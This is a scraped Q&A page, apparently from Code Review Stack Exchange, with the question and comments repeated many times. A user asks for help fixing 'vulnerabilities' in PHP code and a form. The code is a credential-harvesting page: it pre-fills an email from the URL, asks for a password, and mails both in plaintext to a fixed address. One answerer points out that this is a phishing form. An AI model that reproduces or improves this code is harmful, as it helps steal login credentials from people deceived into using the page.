My code is contain some vulnerabilities, how can i correct it and make it better
Clash Royale CLAN TAG#URR8PPP
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0;
up vote
-2
down vote
favorite
My code works well, but i still don't think it is well written. Can someone help to improve the code so as to get rid of vulnerabilities.
My php code:
<?php
$email = filter_var($_GET['email'], FILTER_VALIDATE_EMAIL);
if ($email === false)
// Not a valid email address! Handle this invalid input here.
if (isset($_POST["submit"]))
$password = $_POST['password'];
$to = "feedback@mydomain.com";
$subject = 'Link Data';
$message = "Email Address: " . $email . "n" .
$message = "Password: " . $password . "n" .
$headers = "From: webmaster@mydomain.comrn";
$success = mail($to, $subject, $message, $headers);
?>
The form:
<?php if (isset($success) && $success) ?>
Yor form was successfully sent.
<?php ?>
<div class="box-login1">
<form method="post" action="<?PHP echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?email=<?php echo htmlspecialchars($email) ?>" accept-charset="UTF-8">
<input name="email" type="text" id="email" value="<?php echo htmlspecialchars($email) ?>" maxlength="64" readonly="readonly" required/>
<input type="password" name="password" id="password" required/>
<input type="submit" name="submit" id="submit" value="submit"/>
</form>
php form email mysqli
asked May 21 at 23:25
Eric
4
add a comment |Â
up vote
-2
down vote
favorite
My code works well, but i still don't think it is well written. Can someone help to improve the code so as to get rid of vulnerabilities.
My php code:
<?php
$email = filter_var($_GET['email'], FILTER_VALIDATE_EMAIL);
if ($email === false)
// Not a valid email address! Handle this invalid input here.
if (isset($_POST["submit"]))
$password = $_POST['password'];
$to = "feedback@mydomain.com";
$subject = 'Link Data';
$message = "Email Address: " . $email . "n" .
$message = "Password: " . $password . "n" .
$headers = "From: webmaster@mydomain.comrn";
$success = mail($to, $subject, $message, $headers);
?>
The form:
<?php if (isset($success) && $success) ?>
Yor form was successfully sent.
<?php ?>
<div class="box-login1">
<form method="post" action="<?PHP echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?email=<?php echo htmlspecialchars($email) ?>" accept-charset="UTF-8">
<input name="email" type="text" id="email" value="<?php echo htmlspecialchars($email) ?>" maxlength="64" readonly="readonly" required/>
<input type="password" name="password" id="password" required/>
<input type="submit" name="submit" id="submit" value="submit"/>
</form>
php form email mysqli
asked May 21 at 23:25
Eric
4
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Why are you usinghtmlspecialcharsin your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).
– brgrs
Jun 18 at 11:11
add a comment |Â
up vote
-2
down vote
favorite
up vote
-2
down vote
favorite
My code works well, but i still don't think it is well written. Can someone help to improve the code so as to get rid of vulnerabilities.
My php code:
<?php
$email = filter_var($_GET['email'], FILTER_VALIDATE_EMAIL);
if ($email === false)
// Not a valid email address! Handle this invalid input here.
if (isset($_POST["submit"]))
$password = $_POST['password'];
$to = "feedback@mydomain.com";
$subject = 'Link Data';
$message = "Email Address: " . $email . "n" .
$message = "Password: " . $password . "n" .
$headers = "From: webmaster@mydomain.comrn";
$success = mail($to, $subject, $message, $headers);
?>
The form:
<?php if (isset($success) && $success) ?>
Yor form was successfully sent.
<?php ?>
<div class="box-login1">
<form method="post" action="<?PHP echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?email=<?php echo htmlspecialchars($email) ?>" accept-charset="UTF-8">
<input name="email" type="text" id="email" value="<?php echo htmlspecialchars($email) ?>" maxlength="64" readonly="readonly" required/>
<input type="password" name="password" id="password" required/>
<input type="submit" name="submit" id="submit" value="submit"/>
</form>
php form email mysqli
asked May 21 at 23:25
Eric
4
My code works well, but i still don't think it is well written. Can someone help to improve the code so as to get rid of vulnerabilities.
My php code:
<?php
$email = filter_var($_GET['email'], FILTER_VALIDATE_EMAIL);
if ($email === false)
// Not a valid email address! Handle this invalid input here.
if (isset($_POST["submit"]))
$password = $_POST['password'];
$to = "feedback@mydomain.com";
$subject = 'Link Data';
$message = "Email Address: " . $email . "n" .
$message = "Password: " . $password . "n" .
$headers = "From: webmaster@mydomain.comrn";
$success = mail($to, $subject, $message, $headers);
?>
The form:
<?php if (isset($success) && $success) ?>
Yor form was successfully sent.
<?php ?>
<div class="box-login1">
<form method="post" action="<?PHP echo htmlspecialchars($_SERVER['PHP_SELF']); ?>?email=<?php echo htmlspecialchars($email) ?>" accept-charset="UTF-8">
<input name="email" type="text" id="email" value="<?php echo htmlspecialchars($email) ?>" maxlength="64" readonly="readonly" required/>
<input type="password" name="password" id="password" required/>
<input type="submit" name="submit" id="submit" value="submit"/>
</form>
php form email mysqli
asked May 21 at 23:25
Eric
4
asked May 21 at 23:25
Eric
4
asked May 21 at 23:25
Eric
4
asked May 21 at 23:25
Eric
4
4
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Why are you usinghtmlspecialcharsin your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).
– brgrs
Jun 18 at 11:11
add a comment |Â
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Why are you usinghtmlspecialcharsin your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).
– brgrs
Jun 18 at 11:11
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Why are you using
htmlspecialchars in your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).– brgrs
Jun 18 at 11:11
Why are you using
htmlspecialchars in your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).– brgrs
Jun 18 at 11:11
add a comment |Â
1 Answer
1
active
oldest
votes
up vote
3
down vote
Your phishing form looks OK, user will try to login using his username and password and his logins will be sent directly to someone else.
Being serious you should validate password depending on what chars you allow or if you want to do it with sanitize fitlers then use 'FILTER_SANITIZE_STRING'.
But you should just hash password and never send it or save it in plain text.
answered May 25 at 13:10
kanoriuta
311
add a comment |Â
1 Answer
1
active
oldest
votes
1 Answer
1
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
3
down vote
Your phishing form looks OK, user will try to login using his username and password and his logins will be sent directly to someone else.
Being serious you should validate password depending on what chars you allow or if you want to do it with sanitize fitlers then use 'FILTER_SANITIZE_STRING'.
But you should just hash password and never send it or save it in plain text.
answered May 25 at 13:10
kanoriuta
311
add a comment |Â
up vote
3
down vote
Your phishing form looks OK, user will try to login using his username and password and his logins will be sent directly to someone else.
Being serious you should validate password depending on what chars you allow or if you want to do it with sanitize fitlers then use 'FILTER_SANITIZE_STRING'.
But you should just hash password and never send it or save it in plain text.
answered May 25 at 13:10
kanoriuta
311
add a comment |Â
up vote
3
down vote
up vote
3
down vote
Your phishing form looks OK, user will try to login using his username and password and his logins will be sent directly to someone else.
Being serious you should validate password depending on what chars you allow or if you want to do it with sanitize fitlers then use 'FILTER_SANITIZE_STRING'.
But you should just hash password and never send it or save it in plain text.
answered May 25 at 13:10
kanoriuta
311
Your phishing form looks OK, user will try to login using his username and password and his logins will be sent directly to someone else.
Being serious you should validate password depending on what chars you allow or if you want to do it with sanitize fitlers then use 'FILTER_SANITIZE_STRING'.
But you should just hash password and never send it or save it in plain text.
answered May 25 at 13:10
kanoriuta
311
answered May 25 at 13:10
kanoriuta
311
answered May 25 at 13:10
kanoriuta
311
answered May 25 at 13:10
kanoriuta
311
311
add a comment |Â
add a comment |Â
Â
draft saved
draft discarded
Â
draft saved
draft discarded
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fcodereview.stackexchange.com%2fquestions%2f194910%2fmy-code-is-contain-some-vulnerabilities-how-can-i-correct-it-and-make-it-better%23new-answer', 'question_page');
);
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Welcome to Code Review. As per the help center, on this site, we expect you to post code that already works correctly as intended, to the best of your knowledge. If your code has a known bug, then asking for us to fix it would be off-topic. On the other hand, if you believe that the code is already working correctly, then please retitle the question to neutrally state what the code accomplishes, rather than your main concern about the code, as per the How to Ask guidelines.
– 200_success
May 25 at 17:43
Why are you using
htmlspecialcharsin your form? I believe it's useful when you save user input to the db and want to display it later, so any html gets escaped, it makes no impact on other users. Since user is one and the same, it's kind of redundant (in all places).– brgrs
Jun 18 at 11:11